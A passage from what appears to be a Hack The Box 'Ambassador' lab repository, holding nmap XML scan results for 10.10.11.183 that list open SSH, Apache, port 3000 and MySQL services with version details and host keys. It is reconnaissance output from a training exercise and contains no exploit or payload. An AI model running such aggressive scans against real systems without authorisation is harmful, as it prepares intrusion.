<runstats><finished time="1674563282" timestr="Tue Jan 24 07:28:02 2023" summary="Nmap done at Tue Jan 24 07:28:02 2023; 1 IP address (1 host up) scanned in 18.76 seconds" elapsed="18.76" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

105
HTB/ambassador/results/10.10.11.183/scans/xml/_full_tcp_nmap.xml Normal file
View File

@@ -0,0 +1,105 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Tue Jan 24 07:22:49 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/_full_tcp_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_full_tcp_nmap.xml 10.10.11.183 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/_full_tcp_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_full_tcp_nmap.xml 10.10.11.183" start="1674562969" startstr="Tue Jan 24 07:22:49 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="connect" protocol="tcp" numservices="65535" services="1-65535"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1674562969"/>
<taskend task="NSE" time="1674562969"/>
<taskbegin task="NSE" time="1674562969"/>
<taskend task="NSE" time="1674562969"/>
<taskbegin task="NSE" time="1674562969"/>
<taskend task="NSE" time="1674562969"/>
<taskbegin task="Connect Scan" time="1674562969"/>
<taskend task="Connect Scan" time="1674563007" extrainfo="65535 total ports"/>
<taskbegin task="Service scan" time="1674563007"/>
<taskend task="Service scan" time="1674563275" extrainfo="4 services on 1 host"/>
<taskbegin task="NSE" time="1674563275"/>
<taskend task="NSE" time="1674563283"/>
<taskbegin task="NSE" time="1674563283"/>
<taskend task="NSE" time="1674563304"/>
<taskbegin task="NSE" time="1674563304"/>
<taskend task="NSE" time="1674563304"/>
<host starttime="1674562969" endtime="1674563304"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.11.183" addrtype="ipv4"/>
<hostnames>
<hostname name="ambassador.htb" type="PTR"/>
</hostnames>
<ports><extraports state="closed" count="65531">
<extrareasons reason="conn-refused" count="65531" proto="tcp" ports="1-21,23-79,81-2999,3001-3305,3307-65535"/>
</extraports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh" product="OpenSSH" version="8.2p1 Ubuntu 4ubuntu0.5" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.2p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa; 3072 29dd8ed7171e8e3090873cc651007c75 (RSA)&#xa;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDLYy5+VCwR+2NKWpIRhSVGI1nJQ5YeihevJqIYbfopEW03vZ9SgacRzs4coGfDbcYa+KPePbz2n+2zXytEPfzBzFysLXgTaUlDFcDqEsWP9pJ5UYFNfXqHCOyDRklsetFOBcxkgC8/IcHDJdJQTEr51KLF75ZXaEIcjZ+XuQWsOrU5DJPrAlCmG12OMjsnP4OfI4RpIjELuLCyVSItoin255/99SSM3koBheX0im9/V8IOpEye9Fc2LigyGA+97wwNSZG2G/duS6lE8pYz1unL+Vg2ogGDN85TkkrS3XdfDLI87AyFBGYniG8+SMtLQOd6tCZeymGK2BQe1k9oWoB7/J6NJ0dylAPAVZ1sDAU7KCUPNAex8q6bh0KrO/5zVbpwMB+qEq6SY6crjtfpYnd7+2DLwiYgcSiQxZMnY3ZkJiIf6s5FkJYmcf/oX1xm/TlP9qoxRKYqLtEJvAHEk/mK+na1Esc8yuPItSRaQzpCgyIwiZCdQlTwWBCVFJZqrXc=&#xa; 256 80a4c52e9ab1ecda276439a408973bef (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=&#xa; 256 f590ba7ded55cb7007f2bbc891931bf6 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W"><table>
<elem key="key">AAAAB3NzaC1yc2EAAAADAQABAAABgQDLYy5+VCwR+2NKWpIRhSVGI1nJQ5YeihevJqIYbfopEW03vZ9SgacRzs4coGfDbcYa+KPePbz2n+2zXytEPfzBzFysLXgTaUlDFcDqEsWP9pJ5UYFNfXqHCOyDRklsetFOBcxkgC8/IcHDJdJQTEr51KLF75ZXaEIcjZ+XuQWsOrU5DJPrAlCmG12OMjsnP4OfI4RpIjELuLCyVSItoin255/99SSM3koBheX0im9/V8IOpEye9Fc2LigyGA+97wwNSZG2G/duS6lE8pYz1unL+Vg2ogGDN85TkkrS3XdfDLI87AyFBGYniG8+SMtLQOd6tCZeymGK2BQe1k9oWoB7/J6NJ0dylAPAVZ1sDAU7KCUPNAex8q6bh0KrO/5zVbpwMB+qEq6SY6crjtfpYnd7+2DLwiYgcSiQxZMnY3ZkJiIf6s5FkJYmcf/oX1xm/TlP9qoxRKYqLtEJvAHEk/mK+na1Esc8yuPItSRaQzpCgyIwiZCdQlTwWBCVFJZqrXc=</elem>
<elem key="fingerprint">29dd8ed7171e8e3090873cc651007c75</elem>
<elem key="bits">3072</elem>
<elem key="type">ssh-rsa</elem>
</table>
<table>
<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=</elem>
<elem key="fingerprint">80a4c52e9ab1ecda276439a408973bef</elem>
<elem key="bits">256</elem>
<elem key="type">ecdsa-sha2-nistp256</elem>
</table>
<table>
<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W</elem>
<elem key="fingerprint">f590ba7ded55cb7007f2bbc891931bf6</elem>
<elem key="bits">256</elem>
<elem key="type">ssh-ed25519</elem>
</table>
</script></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="http" product="Apache httpd" version="2.4.41" extrainfo="(Ubuntu)" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.41</cpe></service><script id="http-generator" output="Hugo 0.94.2"/><script id="http-title" output="Ambassador Development Server"><elem key="title">Ambassador Development Server</elem>
</script><script id="http-methods" output="&#xa; Supported Methods: GET POST OPTIONS HEAD"><table key="Supported Methods">
<elem>GET</elem>
<elem>POST</elem>
<elem>OPTIONS</elem>
<elem>HEAD</elem>
</table>
</script><script id="http-server-header" output="Apache/2.4.41 (Ubuntu)"><elem>Apache/2.4.41 (Ubuntu)</elem>
</script></port>
<port protocol="tcp" portid="3000"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ppp" servicefp="SF-Port3000-TCP:V=7.93%I=9%D=1/24%Time=63CFCDC5%P=x86_64-pc-linux-gnu%r(GenericLines,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(GetRequest,174,&quot;HTTP/1\.0\x20302\x20Found\r\nCache-Control:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Tue,\x2024\x20Jan\x202023\x2012:23:34\x20GMT\r\nContent-Length:\x2029\r\n\r\n&lt;a\x20href=\&quot;/login\&quot;&gt;Found&lt;/a&gt;\.\n\n&quot;)%r(Help,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(HTTPOptions,12E,&quot;HTTP/1\.0\x20302\x20Found\r\nCache-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Tue,\x2024\x20Jan\x202023\x2012:23:39\x20GMT\r\nContent-Length:\x200\r\n\r\n&quot;)%r(RTSPRequest,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(Hello,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(SSLSessionReq,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(TerminalServerCookie,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(TLSSessionReq,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(SSLv23SessionReq,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;);" method="table" conf="3"/><script id="fingerprint-strings" output="&#xa; GenericLines, Hello, Help, RTSPRequest, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie: &#xa; HTTP/1.1 400 Bad Request&#xa; Content-Type: text/plain; charset=utf-8&#xa; Connection: close&#xa; Request&#xa; GetRequest: &#xa; HTTP/1.0 302 Found&#xa; Cache-Control: no-cache&#xa; Content-Type: text/html; charset=utf-8&#xa; Expires: -1&#xa; Location: /login&#xa; Pragma: no-cache&#xa; Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax&#xa; X-Content-Type-Options: nosniff&#xa; X-Frame-Options: deny&#xa; X-Xss-Protection: 1; mode=block&#xa; Date: Tue, 24 Jan 2023 12:23:34 GMT&#xa; Content-Length: 29&#xa; href=&quot;/login&quot;&gt;Found&lt;/a&gt;.&#xa; HTTPOptions: &#xa; HTTP/1.0 302 Found&#xa; Cache-Control: no-cache&#xa; Expires: -1&#xa; Location: /login&#xa; Pragma: no-cache&#xa; Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax&#xa; X-Content-Type-Options: nosniff&#xa; X-Frame-Options: deny&#xa; X-Xss-Protection: 1; mode=block&#xa; Date: Tue, 24 Jan 2023 12:23:39 GMT&#xa; Content-Length: 0"><elem key="GenericLines, Hello, Help, RTSPRequest, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie">&#xa; HTTP/1.1 400 Bad Request&#xa; Content-Type: text/plain; charset=utf-8&#xa; Connection: close&#xa; Request</elem>
<elem key="GetRequest">&#xa; HTTP/1.0 302 Found&#xa; Cache-Control: no-cache&#xa; Content-Type: text/html; charset=utf-8&#xa; Expires: -1&#xa; Location: /login&#xa; Pragma: no-cache&#xa; Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax&#xa; X-Content-Type-Options: nosniff&#xa; X-Frame-Options: deny&#xa; X-Xss-Protection: 1; mode=block&#xa; Date: Tue, 24 Jan 2023 12:23:34 GMT&#xa; Content-Length: 29&#xa; href=&quot;/login&quot;&gt;Found&lt;/a&gt;.</elem>
<elem key="HTTPOptions">&#xa; HTTP/1.0 302 Found&#xa; Cache-Control: no-cache&#xa; Expires: -1&#xa; Location: /login&#xa; Pragma: no-cache&#xa; Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax&#xa; X-Content-Type-Options: nosniff&#xa; X-Frame-Options: deny&#xa; X-Xss-Protection: 1; mode=block&#xa; Date: Tue, 24 Jan 2023 12:23:39 GMT&#xa; Content-Length: 0</elem>
</script></port>
<port protocol="tcp" portid="3306"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="mysql" product="MySQL" version="8.0.30-0ubuntu0.20.04.2" method="probed" conf="10"><cpe>cpe:/a:mysql:mysql:8.0.30-0ubuntu0.20.04.2</cpe></service><script id="mysql-info" output="&#xa; Protocol: 10&#xa; Version: 8.0.30-0ubuntu0.20.04.2&#xa; Thread ID: 66&#xa; Capabilities flags: 65535&#xa; Some Capabilities: SupportsLoadDataLocal, Speaks41ProtocolNew, SupportsTransactions, ODBCClient, Support41Auth, SupportsCompression, ConnectWithDatabase, Speaks41ProtocolOld, FoundRows, IgnoreSigpipes, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, InteractiveClient, LongColumnFlag, LongPassword, DontAllowDatabaseTableColumn, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments&#xa; Status: Autocommit&#xa; Salt: CQA;\x02((\x1DG(\x0E&amp;BtT@27\x0B%&#xa; Auth Plugin Name: caching_sha2_password"><elem key="Protocol">10</elem>
<elem key="Version">8.0.30-0ubuntu0.20.04.2</elem>
<elem key="Thread ID">66</elem>
<elem key="Capabilities flags">65535</elem>
<table key="Some Capabilities">
<elem>SupportsLoadDataLocal</elem>
<elem>Speaks41ProtocolNew</elem>
<elem>SupportsTransactions</elem>
<elem>ODBCClient</elem>
<elem>Support41Auth</elem>
<elem>SupportsCompression</elem>
<elem>ConnectWithDatabase</elem>
<elem>Speaks41ProtocolOld</elem>
<elem>FoundRows</elem>
<elem>IgnoreSigpipes</elem>
<elem>SwitchToSSLAfterHandshake</elem>
<elem>IgnoreSpaceBeforeParenthesis</elem>
<elem>InteractiveClient</elem>
<elem>LongColumnFlag</elem>
<elem>LongPassword</elem>
<elem>DontAllowDatabaseTableColumn</elem>
<elem>SupportsAuthPlugins</elem>
<elem>SupportsMultipleResults</elem>
<elem>SupportsMultipleStatments</elem>
</table>
<elem key="Status">Autocommit</elem>
<elem key="Salt">CQA;\x02((\x1DG(\x0E&amp;BtT@27\x0B%</elem>
<elem key="Auth Plugin Name">caching_sha2_password</elem>
</script></port>
</ports>
<times srtt="78461" rttvar="23608" to="172893"/>
</host>
<taskbegin task="NSE" time="1674563304"/>
<taskend task="NSE" time="1674563304"/>
<taskbegin task="NSE" time="1674563304"/>
<taskend task="NSE" time="1674563304"/>
<taskbegin task="NSE" time="1674563304"/>
<taskend task="NSE" time="1674563304"/>
<runstats><finished time="1674563304" timestr="Tue Jan 24 07:28:24 2023" summary="Nmap done at Tue Jan 24 07:28:24 2023; 1 IP address (1 host up) scanned in 335.34 seconds" elapsed="335.34" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

105
HTB/ambassador/results/10.10.11.183/scans/xml/_quick_tcp_nmap.xml Normal file
View File

@@ -0,0 +1,105 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Tue Jan 24 07:22:49 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_quick_tcp_nmap.xml 10.10.11.183 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_quick_tcp_nmap.xml 10.10.11.183" start="1674562969" startstr="Tue Jan 24 07:22:49 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="connect" protocol="tcp" numservices="1000" services="1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1674562969"/>
<taskend task="NSE" time="1674562969"/>
<taskbegin task="NSE" time="1674562969"/>
<taskend task="NSE" time="1674562969"/>
<taskbegin task="NSE" time="1674562969"/>
<taskend task="NSE" time="1674562969"/>
<taskbegin task="Connect Scan" time="1674562969"/>
<taskend task="Connect Scan" time="1674562970" extrainfo="1000 total ports"/>
<taskbegin task="Service scan" time="1674562970"/>
<taskend task="Service scan" time="1674563237" extrainfo="4 services on 1 host"/>
<taskbegin task="NSE" time="1674563237"/>
<taskend task="NSE" time="1674563243"/>
<taskbegin task="NSE" time="1674563243"/>
<taskend task="NSE" time="1674563263"/>
<taskbegin task="NSE" time="1674563263"/>
<taskend task="NSE" time="1674563263"/>
<host starttime="1674562969" endtime="1674563263"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.11.183" addrtype="ipv4"/>
<hostnames>
<hostname name="ambassador.htb" type="PTR"/>
</hostnames>
<ports><extraports state="closed" count="996">
<extrareasons reason="conn-refused" count="996" proto="tcp" ports="1,3-4,6-7,9,13,17,19-21,23-26,30,32-33,37,42-43,49,53,70,79,81-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
</extraports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh" product="OpenSSH" version="8.2p1 Ubuntu 4ubuntu0.5" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.2p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa; 3072 29dd8ed7171e8e3090873cc651007c75 (RSA)&#xa;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDLYy5+VCwR+2NKWpIRhSVGI1nJQ5YeihevJqIYbfopEW03vZ9SgacRzs4coGfDbcYa+KPePbz2n+2zXytEPfzBzFysLXgTaUlDFcDqEsWP9pJ5UYFNfXqHCOyDRklsetFOBcxkgC8/IcHDJdJQTEr51KLF75ZXaEIcjZ+XuQWsOrU5DJPrAlCmG12OMjsnP4OfI4RpIjELuLCyVSItoin255/99SSM3koBheX0im9/V8IOpEye9Fc2LigyGA+97wwNSZG2G/duS6lE8pYz1unL+Vg2ogGDN85TkkrS3XdfDLI87AyFBGYniG8+SMtLQOd6tCZeymGK2BQe1k9oWoB7/J6NJ0dylAPAVZ1sDAU7KCUPNAex8q6bh0KrO/5zVbpwMB+qEq6SY6crjtfpYnd7+2DLwiYgcSiQxZMnY3ZkJiIf6s5FkJYmcf/oX1xm/TlP9qoxRKYqLtEJvAHEk/mK+na1Esc8yuPItSRaQzpCgyIwiZCdQlTwWBCVFJZqrXc=&#xa; 256 80a4c52e9ab1ecda276439a408973bef (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=&#xa; 256 f590ba7ded55cb7007f2bbc891931bf6 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W"><table>
<elem key="fingerprint">29dd8ed7171e8e3090873cc651007c75</elem>
